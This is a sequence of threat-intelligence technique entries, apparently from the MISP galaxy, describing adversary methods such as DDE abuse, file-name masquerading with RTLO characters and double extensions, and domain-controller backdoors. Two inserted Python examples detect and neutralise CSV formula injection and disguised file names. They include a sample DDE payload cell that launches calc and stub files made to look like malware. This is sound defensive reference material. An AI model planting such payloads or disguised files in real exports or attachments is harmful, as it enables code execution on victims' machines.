Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://app.tidalcyber.com/technique/34674b83-86a7-4ad9-8b05-49b505aa5ef0)).

The tag is: misp-galaxy:technique="Input Capture"

Internal Spearphishing

Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is a multi-staged campaign in which an email account is taken over either by controlling the user’s device with previously installed malware or by compromising the user’s account credentials. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.<sup>[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)]</sup>

Adversaries may leverage [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) or [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) on sites that mimic email login interfaces.

There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.<sup>[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)]</sup> The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.<sup>[[THE FINANCIAL TIMES LTD 2019.](https://app.tidalcyber.com/references/5a01f0b7-86f7-44a1-bf35-46a631402ceb)]</sup>

The tag is: misp-galaxy:technique="Internal Spearphishing"

Component Object Model

Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup> Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup> Remote COM execution is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and Visual Basic.<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup> Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup><sup>[[ProjectZero File Write EoP Apr 2018](https://app.tidalcyber.com/references/2c49288b-438d-487a-8e6e-f9d9eda73e2f)]</sup>

The tag is: misp-galaxy:technique="Component Object Model"

Dynamic Data Exchange

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.<sup>[[BleepingComputer DDE Disabled in Word Dec 2017](https://app.tidalcyber.com/references/d6f93310-77b6-491e-ba9d-ec1faf8de7e4)]</sup><sup>[[Microsoft ADV170021 Dec 2017](https://app.tidalcyber.com/references/ce960e76-848f-440d-9843-54773f7b11cf)]</sup><sup>[[Microsoft DDE Advisory Nov 2017](https://app.tidalcyber.com/references/955b0074-a1d6-40b5-9437-bd2548daf54c)]</sup>

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.<sup>[[SensePost PS DDE May 2016](https://app.tidalcyber.com/references/28b3c105-8d64-4767-a735-d353d1fee756)]</sup><sup>[[Kettle CSV DDE Aug 2014](https://app.tidalcyber.com/references/2badfb63-19a3-4829-bbb5-7c3dfab877d5)]</sup><sup>[[Enigma Reviving DDE Jan 2018](https://app.tidalcyber.com/references/188a0f02-8d1e-4e4e-b2c0-ddf1bf1bdf93)]</sup><sup>[[SensePost MacroLess DDE Oct 2017](https://app.tidalcyber.com/references/1036fbbb-f731-458a-b38c-42431612c0ad)]</sup> Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.<sup>[[OWASP CSV Injection](https://app.tidalcyber.com/references/0cdde66c-a7ae-48a2-8ade-067643de304d)]</sup><sup>[[CSV Excel Macro Injection ](https://app.tidalcyber.com/references/22c871ff-2701-4809-9f5b-fb29da7481e8)]</sup>
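The CSV variant described above is the one a defender most often has to handle in application code, because any export that places user-controlled strings into cells is a delivery vehicle. The following is an added example, not code from this page or from the MISP project: a scanner that flags cells a spreadsheet would evaluate as formulas (the DDE `=cmd|...` form, plus the `+`, `-`, `@`, tab and carriage-return prefixes that are interpreted the same way) and a sanitiser that forces such cells to be read as text. The export text and the payload cell are constructed for the example; the payload follows the well-known OWASP illustration.

```python
# Added example (not page or MISP code): detect and neutralise DDE/formula
# injection in CSV data before it reaches a spreadsheet application.
import csv
import io

# Leading characters a spreadsheet treats as the start of a formula, plus the
# separators that let a payload hide behind an innocent-looking first field.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value: str) -> bool:
    """True when the cell would be evaluated rather than displayed."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralise(value: str) -> str:
    """Prefix a formula-looking cell with an apostrophe so it is stored as a
    literal string; non-formula cells are returned unchanged."""
    return "'" + value if is_formula_cell(value) else value


def scan_csv(text: str) -> list:
    """Return (row, column, cell) for every formula-looking cell in the CSV."""
    return [(r, c, cell)
            for r, row in enumerate(csv.reader(io.StringIO(text)))
            for c, cell in enumerate(row)
            if is_formula_cell(cell)]


def sanitise_csv(text: str) -> str:
    """Re-emit the CSV with formula cells neutralised. QUOTE_ALL also doubles
    any embedded quotes, so a payload cannot break out of its field."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralise(cell) for cell in row])
    return out.getvalue()


# Constructed export: one DDE cell that would spawn calc.exe, plus a phone
# number whose leading "+" shows the false-positive cost of the trigger set.
SAMPLE_EXPORT = (
    "username,comment\n"
    "alice,fine\n"
    "bob,\"=cmd|' /C calc'!A0\"\n"
    "eve,+1 (555) 0100\n"
)

if __name__ == "__main__":
    for r, c, cell in scan_csv(SAMPLE_EXPORT):
        print(f"row {r} col {c}: {cell!r}")
    print(sanitise_csv(SAMPLE_EXPORT))
```

The scan reports rows 2 and 3; after `sanitise_csv` nothing is reported, since every flagged cell now begins with `'`. The phone-number hit is deliberate: escaping is cheap and reversible, so over-matching on `+`/`-` is preferable to letting one `=cmd|` cell through in a report that an analyst opens in Excel.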

DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). DDE execution can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>

The tag is: misp-galaxy:technique="Dynamic Data Exchange"

XPC Services

Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.<sup>[[creatingXPCservices](https://app.tidalcyber.com/references/029acdee-95d6-47a7-86de-0f6b925cef9c)]</sup><sup>[[Designing Daemons Apple Dev](https://app.tidalcyber.com/references/4baac228-1f6a-4c65-ae98-5a542600dfc6)]</sup>

Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application’s XPC Services handler.<sup>[[CVMServer Vuln](https://app.tidalcyber.com/references/6f83da0c-d2ce-4923-ba32-c6886eb22587)]</sup><sup>[[Learn XPC Exploitation](https://app.tidalcyber.com/references/da995792-b78b-4db5-85d8-99fda96c6826)]</sup> This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).

The tag is: misp-galaxy:technique="XPC Services"

Inter-Process Communication

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occur when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms differ depending on the OS, but typically exist in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) or [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66). Linux environments support several different IPC mechanisms, two of which are sockets and pipes.<sup>[[Linux IPC](https://app.tidalcyber.com/references/05293061-ce09-49b5-916a-bb7353acfdfa)]</sup> Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) to facilitate remote IPC execution.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>

The tag is: misp-galaxy:technique="Inter-Process Communication"

Lateral Tool Transfer

Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.

Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) to connected network shares or with authenticated connections via Remote Desktop Protocol.<sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>

Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). In some cases, adversaries may be able to leverage [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>

The tag is: misp-galaxy:technique="Lateral Tool Transfer"

Log Enumeration

Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3)), security or vulnerable software ([Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602)), or hosts within a compromised network ([Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f)).

Host binaries may be leveraged to collect system logs. Examples include using wevtutil.exe or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) on Windows to access and/or export security event information.<sup>[[WithSecure Lazarus-NoPineapple Threat Intel Report 2023](https://app.tidalcyber.com/references/195922fa-a843-5cd3-a153-32f0b960dcb9)]</sup><sup>[[Cadet Blizzard emerges as novel threat actor](https://app.tidalcyber.com/references/7180c6a7-e6ea-54bf-bcd7-c5238bbc5f5b)]</sup> In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s CollectGuestLogs.exe to collect security logs from cloud hosted infrastructure.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup>

Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.

The tag is: misp-galaxy:technique="Log Enumeration"

Break Process Trees

An adversary may attempt to evade process tree-based analysis by modifying executed malware’s parent process ID (PPID). If endpoint protection software leverages the “parent-child” relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.<sup>[[3OHA double-fork 2022](https://app.tidalcyber.com/references/521b79fe-bb7b-52fd-a899-b73e254027a5)]</sup>

On Linux systems, adversaries may execute a series of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to alter malware’s process tree. For example, adversaries can execute their payload without any arguments, call fork() twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the init system process (PID 1), which successfully disconnects the execution of the adversary’s payload from its previous process tree.

Another example is using the “daemon” syscall to detach from the current parent process and run in the background.<sup>[[Sandfly BPFDoor 2022](https://app.tidalcyber.com/references/01c8337f-614b-5f63-870f-5c880b390922)]</sup><sup>[[Microsoft XorDdos Linux Stealth 2022](https://app.tidalcyber.com/references/6425d351-2c88-5af9-970a-4d0d184d0c70)]</sup>

The tag is: misp-galaxy:technique="Break Process Trees"

Double File Extension

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.<sup>[[PCMag DoubleExtension](https://app.tidalcyber.com/references/a729519d-8c9f-477c-b992-434076a9d294)]</sup><sup>[[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)]</sup>

Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) into a user’s system via [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) then [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.<sup>[[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)]</sup>

Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

The tag is: misp-galaxy:technique="Double File Extension"

Invalid Code Signature

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.<sup>[[Threatexpress MetaTwin 2017](https://app.tidalcyber.com/references/156efefd-793f-4219-8904-ef160a45c9ec)]</sup>

Unlike [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), this activity will not result in a valid signature.

The tag is: misp-galaxy:technique="Invalid Code Signature"

Masquerade File Type

Adversaries may masquerade malicious payloads as legitimate files through changes to the payload’s formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. The header of a JPEG file, for instance, is <code>0xFF 0xD8</code> and the file extension is .JPE, .JPEG, or .JPG.

Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and stored (e.g., [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe)) so that adversaries may move their malware without triggering detections.

Common non-executable file types and extensions, such as text files (.txt) and image files (.jpg, .gif, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of <code>test.gif</code>. A user may not know that a file is malicious due to the benign appearance and file extension.

Polyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malware and its capabilities.<sup>[[polygot_icedID](https://app.tidalcyber.com/references/dcd65d74-4e7b-5ddd-8c72-700456981347)]</sup>

The tag is: misp-galaxy:technique="Masquerade File Type"

Masquerade Task or Service

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.<sup>[[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)]</sup><sup>[[Systemd Service Units](https://app.tidalcyber.com/references/43bae447-d2e3-4b53-b17b-12a0b54ac604)]</sup> Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.<sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Fysbis Dr Web Analysis](https://app.tidalcyber.com/references/f1eb4818-fda6-46f2-9d5a-5469a5ed44fc)]</sup>

The tag is: misp-galaxy:technique="Masquerade Task or Service"

Match Legitimate Name or Location

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

The tag is: misp-galaxy:technique="Match Legitimate Name or Location"

Rename System Utilities

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing.<sup>[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup> It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>).<sup>[[Elastic Masquerade Ball](https://app.tidalcyber.com/references/29c17b60-f947-4482-afa6-c80ca5819d10)]</sup> An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths.<sup>[[F-Secure CozyDuke](https://app.tidalcyber.com/references/08e1d233-0580-484e-b737-af091e2aa9ea)]</sup>

The tag is: misp-galaxy:technique="Rename System Utilities"

Right-to-Left Override

Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.<sup>[[Infosecinstitute RTLO Technique](https://app.tidalcyber.com/references/79d21506-07a8-444d-a2d7-c91de67c393e)]</sup>

Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)/[Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.<sup>[[Trend Micro PLEAD RTLO](https://app.tidalcyber.com/references/9a052eba-1708-44c9-a20f-8b4ef208fa14)]</sup><sup>[[Kaspersky RTLO Cyber Crime](https://app.tidalcyber.com/references/38fbd993-de98-49e9-8437-bc6a1493d6ed)]</sup> RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.

The tag is: misp-galaxy:technique="Right-to-Left Override"

Space after Filename

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.

For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed.<sup>[[Mac Backdoors are back](https://app.tidalcyber.com/references/c37f00dc-ee53-4be1-9046-0a28bdc5649a)]</sup>

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:technique="Space after Filename"
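The four file-name masquerades described above (Double File Extension, Masquerade File Type, Right-to-Left Override and Space after Filename) all leave artifacts a defender can check for before a file reaches a user. The following is an added example, not code from the MISP or Tidal Cyber projects: it flags a benign-looking first extension in front of an executable one, a bidi override character (and shows what a naive renderer would display), a trailing space, and a mismatch between the extension and the file header. The extension lists, the magic-byte table and the sample files are constructed for the example and should be tuned for a real environment.

```python
from __future__ import annotations

RTLO = "\u202e"  # right-to-left override
LRO = "\u202d"   # left-to-right override, the same trick in the other direction

# Illustrative lists (assumption for this example): extensions that execute or
# run as code, and extensions that users commonly regard as harmless.
EXECUTABLE_EXTS = {"exe", "scr", "lnk", "hta", "js", "vbs", "bat", "cmd",
                   "ps1", "dll", "com", "pif", "jar"}
BENIGN_EXTS = {"txt", "doc", "docx", "pdf", "jpg", "jpeg", "jpe", "gif", "png"}

# Magic bytes from the public format specifications for a few "benign" types.
MAGIC = {
    "jpg": b"\xff\xd8", "jpeg": b"\xff\xd8", "jpe": b"\xff\xd8",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8", "pdf": b"%PDF",
}
# Headers that identify executable or script content whatever the extension says.
EXEC_MAGIC = {
    "PE executable": b"MZ", "ELF": b"\x7fELF",
    "Mach-O": b"\xcf\xfa\xed\xfe", "PHP": b"<?php",
}


def display_name(name: str) -> str:
    """Approximate what a naive renderer shows: text after an RTLO is reversed."""
    if RTLO not in name:
        return name
    head, tail = name.split(RTLO, 1)
    return head + tail[::-1]


def check_name(name: str) -> list[str]:
    """Findings that can be made from the file name alone."""
    findings = []
    if RTLO in name or LRO in name:
        findings.append(f"bidi override character; renders as {display_name(name)!r}")
    if name != name.rstrip(" "):
        findings.append("trailing space after extension")
    parts = name.rstrip(" ").split(".")
    if len(parts) >= 3:
        last, prev = parts[-1].lower(), parts[-2].lower()
        if last in EXECUTABLE_EXTS and prev in BENIGN_EXTS:
            findings.append(f"double extension: shows as .{prev}, runs as .{last}")
    return findings


def check_content(name: str, data: bytes) -> list[str]:
    """Findings that need the first bytes of the file."""
    findings = []
    stripped = name.rstrip(" ")
    ext = stripped.rsplit(".", 1)[-1].lower() if "." in stripped else ""
    expected = MAGIC.get(ext)
    if expected and not data.startswith(expected):
        findings.append(f"extension .{ext} but header {data[:4]!r} does not match")
    for label, sig in EXEC_MAGIC.items():
        if data.startswith(sig) and ext in BENIGN_EXTS:
            findings.append(f"{label} content behind benign extension .{ext}")
    return findings


def scan(files: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each suspicious file name to its findings; clean files are omitted."""
    report = {}
    for name, data in files.items():
        findings = check_name(name) + check_content(name, data)
        if findings:
            report[name] = findings
    return report


# Constructed sample set: the names mirror the text above, the contents are stubs.
SAMPLE_FILES = {
    "report.pdf": b"%PDF-1.7\n%constructed\n",
    "Evil.txt.exe": b"MZ\x90\x00constructed PE stub",
    "photo_high_re\u202egnp.js": b"alert('constructed');",
    "March 25 \u202excod.scr": b"MZ\x90\x00constructed PE stub",
    "test.gif": b"<?php echo 'constructed'; ?>",
    "evil.txt ": b"\xcf\xfa\xed\xfe constructed Mach-O header",
}

if __name__ == "__main__":
    for name, findings in scan(SAMPLE_FILES).items():
        print(repr(name))
        for f in findings:
            print("   ", f)
```

The `display_name` helper is what makes RTLO findings actionable in a ticket: an analyst sees both the stored name and the name the user would have seen. Mail gateways and EDR rules commonly implement the same checks; this version is meant to show the logic, not replace them.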

Masquerading

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of Masquerading.<sup>[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup> Masquerading may also include the use of [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.

The tag is: misp-galaxy:technique="Masquerading"

Domain Controller Authentication

Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.<sup>[[Dell Skeleton](https://app.tidalcyber.com/references/cea9ce77-7641-4086-b92f-a4c3ad94a49c)]</sup>

The tag is: misp-galaxy:technique="Domain Controller Authentication"

Hybrid Identity

Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.

Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD<sup>[[Azure AD Hybrid Identity](https://app.tidalcyber.com/references/b019406c-6e39-41a2-a8b4-97f8d6482147)]</sup>:

  • Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud

  • Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory

  • Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD

AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.

